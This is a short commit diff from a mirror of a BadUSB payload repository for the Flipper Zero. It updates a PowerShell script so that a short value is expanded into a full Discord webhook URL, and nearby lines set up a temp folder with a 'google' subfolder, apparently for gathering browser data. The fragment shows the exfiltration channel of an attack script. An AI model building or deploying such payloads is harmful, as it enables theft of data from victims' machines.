mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-24 20:10:12 -08:00
Update main.ps1
This commit is contained in:
@@ -1,5 +1,8 @@
|
||||
|
||||
$dc = "$dc"
|
||||
if ($dc.Length -lt 120){
|
||||
$dc = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
$temp = [System.IO.Path]::GetTempPath()
|
||||
$tempFolder = Join-Path -Path $temp -ChildPath 'dbfiles'
|
||||
$googledest = Join-Path -Path $tempFolder -ChildPath 'google'
|
||||
|
||||
Reference in New Issue
Block a user